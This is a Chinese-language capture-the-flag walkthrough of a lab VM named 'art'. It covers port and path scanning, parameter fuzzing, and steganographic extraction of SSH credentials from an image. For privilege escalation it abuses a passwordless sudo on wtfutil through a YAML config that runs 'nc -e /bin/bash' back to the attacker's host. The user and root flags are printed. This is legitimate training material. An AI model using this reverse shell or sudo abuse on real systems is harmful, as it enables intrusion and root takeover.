信息搜集
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -p- -Pn 192.168.122.230
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-11 10:14 EDT
Nmap scan report for 192.168.122.230
Host is up (0.00033s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.18.0
MAC Address: 08:00:27:01:05:B1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.31 seconds
路径扫描
┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -t 100 -b 403,404 -x php,* -u http://192.168.122.230
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.122.230
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,*
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 170]
除了照片什么也没有,查看源码发现提示,应该是需要参数,在url后面,于是fuzz一下
<!-- Need to solve tag parameter problem. -->wfuzz -w /usr/share/seclists/Discovery/Web-Content/url-params_from-top-55-most-popular-apps.txt --hc=404 --hh=12 -u 'http://192.168.122.230/index.php?FUZZ=FUZZ'
000000097: 200 4 L 12 W 70 Ch "tag - tag" 再次fuzz,这里需要注意的是要学会利用参数–hh,通过他可以过滤相同的参数,从而更加方便找到答案
┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc=404 --hh=12,170,70 -u 'http://192.168.122.230/index.php?tag=FUZZ'
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.122.230/index.php?tag=FUZZ
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002906: 200 4 L 14 W 93 Ch "beauty"
000009517: 200 4 L 14 W 93 Ch "Beauty" 发现一只小羊的图片,下载下来,看能不能找到什么东西
stegseek .jpg
┌──(root㉿kali)-[/home/kali/Desktop/ti root]
└─# stegseek '/home/kali/Desktop/dsa32.jpg'
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "yes.txt".
[i] Extracting to "dsa32.jpg.out".
lion/shel0vesyou获取shell
利用ssh登录,发现user.txt
user.txt:HMVygUmTyvRPWduINKYfmpO提权
sudo -l 发现一个不用密码执行的命令
Matching Defaults entries for lion on art:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lion may run the following commands on art:
(ALL : ALL) NOPASSWD: /bin/wtfutil发现wtf可以指定文件通过-config参数WTF 使用指南:自制高逼格终端仪表盘_仪表盘 golang-CSDN博客
创建a.yml
wtf:
grid:
columns: [20, 20]
rows: [3, 3]
refreshInterval: 1
mods:
uptime:
type: cmdrunner
args: ['-e','/bin/bash','192.168.122.205','1234']
cmd: "nc"
enabled: true
position:
top: 0
left: 0
height: 1
width: 1
refreshInterval: 30
设置监听,而后获得root
kali:
sudo -u root /bin/wtfutil --config=a.yml
nc -lnvp 1234
listening on [any] 1234 ...
connect to [192.168.122.205] from (UNKNOWN) [192.168.122.230] 39530
find / -name root.txt
/var/opt/root.txt
cd /var/opt
ls- al
ls -al
total 12
drwxr-xr-x 2 root root 4096 ago 3 2022 .
drwxr-xr-x 12 root root 4096 ago 3 2022 ..
-rw------- 1 root root 24 ago 3 2022 root.txt
cat root.ttx
cat root.txt
mZxbPCjEQYOqkNCuyIuTHMV
知识点
- 图片隐写
- wtf的提权